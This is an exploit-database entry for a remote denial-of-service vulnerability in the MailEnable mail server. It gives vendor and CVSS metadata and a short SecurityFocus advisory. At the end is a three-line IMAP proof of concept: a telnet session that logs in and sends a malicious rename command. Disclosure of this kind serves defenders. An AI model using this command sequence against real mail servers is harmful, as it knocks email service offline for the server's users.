header-logo
Suggest Exploit
vendor:
MailEnable
by:
Unknown
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: MailEnable
Affected Version From: All versions of MailEnable
Affected Version To: Unknown
Patch Exists: No
Related CWE: Unknown
CPE: a:mailenable:mailenable
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Remote Denial of Service Vulnerability in MailEnable

The vulnerability in MailEnable allows remote attackers to trigger a denial of service condition by issuing a malicious rename request following authentication.

Mitigation:

No specific mitigation or remediation information provided.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15556/info

MailEnable is prone to a remote denial of service vulnerability.

The vulnerability presents itself when a user issues a malicious rename request following authentication.

Remote attackers can exploit this issue to trigger a denial of service condition. 

telnet localhost 143
a1 login josh byebye
a2 rename foo bar

where josh and byebye are the login credentials for an existing mailbox.